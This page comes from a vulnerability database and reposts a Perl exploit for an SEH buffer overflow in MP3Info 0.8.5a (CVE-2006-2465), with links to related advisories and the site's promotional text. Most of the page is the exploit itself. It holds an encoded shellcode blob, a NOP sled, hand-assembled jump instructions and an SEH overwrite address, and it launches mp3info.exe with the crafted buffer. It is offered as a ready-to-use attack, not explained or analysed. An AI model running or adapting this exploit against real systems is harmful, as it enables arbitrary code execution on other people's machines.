Lucene search
K

MP3Info 0.8.5a - SEH Buffer Overflow Exploit

🗓️ 19 Mar 2014 00:00:00Reported by Ayman SagyType 
zdt
 zdt
🔗 0day.today👁 41 Views

MP3Info 0.8.5a SEH Buffer Overflow Exploit with shellcod

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-2465
27 Jan 201400:00
circl
CVE
CVE-2006-2465
19 May 200610:00
cve
Cvelist
CVE-2006-2465
19 May 200610:00
cvelist
Debian CVE
CVE-2006-2465
19 May 200610:00
debiancve
myhack58
Linux vulnerability analysis-MP3Info 0.8.5 a code execution vulnerability, CVE-2006-2465-a vulnerability warning-the black bar safety net
5 Mar 201700:00
myhack58
NVD
CVE-2006-2465
19 May 200610:02
nvd
OSV
DEBIAN-CVE-2006-2465
19 May 200610:02
osv
Packet Storm
MP3Info 0.8.5 SEH Buffer Overflow
19 Mar 201400:00
packetstorm
Prion
Buffer overflow
19 May 200610:02
prion
$shellcode = 
"\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" .
"\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" .
"\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b" .
"\x17\xb5\x49\xc7\x75\x2d\xd9\xa5\x51\x42\x6a\x03\x84\x6d" .
"\x6b\xa5\x08\x21\xaf\xa7\xf4\x3b\xfc\x07\xc4\xf4\xf1\x46" .
"\x01\xe8\xfa\x1b\xda\x67\xa8\x8b\x6f\x35\x71\xad\xbf\x32" .
"\xc9\xd5\xba\x84\xbe\x6f\xc4\xd4\x6f\xfb\x8e\xcc\x04\xa3" .
"\x2e\xed\xc9\xb7\x13\xa4\x66\x03\xe7\x37\xaf\x5d\x08\x06" .
"\x8f\x32\x37\xa7\x02\x4a\x7f\x0f\xfd\x39\x8b\x6c\x80\x39" .
"\x48\x0f\x5e\xcf\x4d\xb7\x15\x77\xb6\x46\xf9\xee\x3d\x44" .
"\xb6\x65\x19\x48\x49\xa9\x11\x74\xc2\x4c\xf6\xfd\x90\x6a" .
"\xd2\xa6\x43\x12\x43\x02\x25\x2b\x93\xea\x9a\x89\xdf\x18" .
"\xce\xa8\xbd\x76\x11\x38\xb8\x3f\x11\x42\xc3\x6f\x7a\x73" .
"\x48\xe0\xfd\x8c\x9b\x45\xf1\xc6\x86\xef\x9a\x8e\x52\xb2" .
"\xc6\x30\x89\xf0\xfe\xb2\x38\x88\x04\xaa\x48\x8d\x41\x6c" .
"\xa0\xff\xda\x19\xc6\xac\xdb\x0b\xa5\x33\x48\xd7\x2a";
 
 
$exploit = "\x90"x156 . $shellcode;
$exploit .= "\x41"x142;
 
                                     
$exploit .=                             # larger jump to beginning of buffer
            "\x58\x58\x58".             # 58 POP EAX x 3
            "\x80\xc4\x02".             # 80C4 02          ADD AH,2
            "\xFF\xE0";                 # FFE0             JMP EAX   
 
 
$exploit .= "\xEB\xEF\x90\x90"; # short jmp back to get some space
 
 
#print length($exploit);
#exit(0);
print "\n";
$seh = "\x46\x34\x40"; # 0x00403446  mp3info.exe             POP EBX 
 
$exploit = $exploit . $seh;
 
system("mp3info.exe", $exploit);

#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.25665
41